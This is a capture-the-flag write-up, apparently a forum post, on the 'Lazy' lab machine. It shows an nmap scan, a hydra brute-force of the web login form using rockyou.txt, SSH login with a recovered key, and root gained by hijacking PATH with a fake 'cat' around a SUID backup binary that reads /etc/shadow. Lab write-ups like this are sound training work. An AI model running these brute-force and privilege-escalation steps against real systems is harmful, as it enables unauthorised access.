Lazy by Coding_Karma {Noob Ways}

We start with a direct nmap scan

nmap -sV -O -A 10.10.10.18

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-09 13:44 IST
Nmap scan report for 10.10.10.18
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 e1:92:1b:48:f8:9b:63:96:d4:e5:7a:40:5f:a4:c8:33 (DSA)
|   2048 af:a0:0f:26:cd:1a:b5:1f:a7:ec:40:94:ef:3c:81:5f (RSA)
|   256 11:a3:2f:25:73:67:af:70:18:56:fe:a2:e3:54:81:e8 (ECDSA)
|_  256 96:81:9c:f4:b7:bc:1a:73:05:ea:ba:41:35:a4:66:b7 (EdDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: CompanyDev
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=10/9%OT=22%CT=1%CU=39083%PV=Y%DS=2%DC=T%G=Y%TM=59DB301
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10C%TI=Z%CI=I%TS=8)SEQ(SP=1
OS:06%GCD=1%ISR=10C%TI=Z%TS=8)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT1
OS:1NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=71
OS:20%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=
OS:)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W
OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S
OS:+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUC
OS:K=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   302.44 ms 10.10.14.1
2   303.53 ms 10.10.10.18

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.46 seconds

So we can see a port 80 that’s open lets head to the page and we try to log in as admin:admin at this point i saw admin being saved and being prompt as username so i planned to try “hydra”
with this command
hydra -l admin -P rockyou.txt 10.10.10.18 http-post-form "/login.php:username=^USER^&password=^PASS^&rememberme=on:Invalid credentials"
After a little while we got a result from the hydra saying :-
"host: 10.10.10.18 login: admin password: p4ssw0rd"
We got inside the admin page took the key and now we are left a username which can be seen if you notice the heading of the SSH key page ie http://10.10.10.18/mysshkeywithnamemitsos

so once we got the key we need to save it and chmod 600 key.txt then we ssh to the box using ssh -i key.txt mitsos@10.10.10.18 it’s pretty simple to grab the user.txt moving on to the root.txt

the moment I saw the “Binary name Backup” i ran a string on it

mitsos@LazyClown:/home$ cd mitsos
mitsos@LazyClown:~$ ls
backup  peda  peda-session-backup.txt  test.py  user.txt
mitsos@LazyClown:~$ strings backup
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
cat /etc/shadow
;*2$"
GCC: (Ubuntu 4.8.4-2ubuntu1~14.04.3) 4.8.4
.symtab

the moment i saw cat /etc/shadow

i did
echo "/bin/sh" > cat
chmod +x cat
PATH=.:$PATH backup
and got the root hash.

The oracle padding attack works as well i actually did that first before coming up with hydra but Ippsec already did a video on that i think so i didn’t cover that method :slight_smile:

Good job, for the other ways to login into the webapp check this.